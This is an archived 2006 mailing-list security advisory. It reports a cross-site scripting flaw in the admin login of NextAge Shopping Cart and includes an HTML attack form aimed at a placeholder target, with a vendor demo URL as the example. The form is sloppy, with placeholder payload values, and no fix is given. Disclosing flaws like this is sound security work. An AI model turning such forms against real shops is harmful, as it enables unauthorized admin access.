Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

NextAge Shopping Cart Software XSS

from [AminRayden] Network Security [Permanent Link]
Subject: NextAge Shopping Cart Software XSS
Date: 25 Apr 2006 02:21:21 -0000 
NextAge Shopping Cart Software XSS
-------------------------------------------------------
Aria-security.com advisory
Bug Discovered by R@1D3N (amin emami)
AminRayden@yahoo.com
Date:25/04/2005
original 
advisory:http://www.aria-security.net/advisory/nextage/nextageshoppingcart.txt
--------------------------------------------------------
Affected software description:
NextAge Shopping Cart Software
Vendor:http://www.nextagecart.com
Vulnerability: Fake form injection <Xss>
---------------------------------------------------------
information About NextAge Shopping Cart Software:
NextAge Cart Software can be used both as a ready out-of-the-box shopping cart 
solution and as a powerful shopping
 cart engine for a customized web shop. NextAge Cart is an extremely powerful 
shopping cart
and web site builder application that allows you to customize, manage and 
effectively market your on-line store. 
---------------------------------------------------------
Disscution:
A remote user can conduct cross-site scripting attacks.The 'panel' script does 
not properly
validate user-supplied input at the username and password.So remote user can 
access to admin panel
----------------------------------------------------------
Exploit:
example:http://www.nextagecart.com/demo/myadmin/index.php

<form method="pst" action="http://[target]/[admin_Path]/index.php";>
<input type="text" name="txtuserid" class="INPUT" size="30" value="xss 
injection code">
<br>
<input type="password" name="txtpass" class="INPUT" size="30" value="xss 
injection code">
<br>
<input <input type="submit" value="submit" class="button">
</form>

--------------
Solution:
N/A

-------------
Greet:A.u.r.a - outlaw - majid - behzad
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • NextAge Shopping Cart Software XSS, AminRayden <=
Previous by Date:  photokorn 1.53 , 1.542 << Sql, Dr-Jr7
Next by Date:  [ MDKSA-2006:075 ] - Updated mozilla-firefox packages fix numerous vulnerabilities, security
Previous by Thread:  photokorn 1.53 , 1.542 << Sql, Dr-Jr7
Next by Thread:  [ MDKSA-2006:075 ] - Updated mozilla-firefox packages fix numerous vulnerabilities, security
Indexes:  [Date] [Thread] [Top] [All Lists]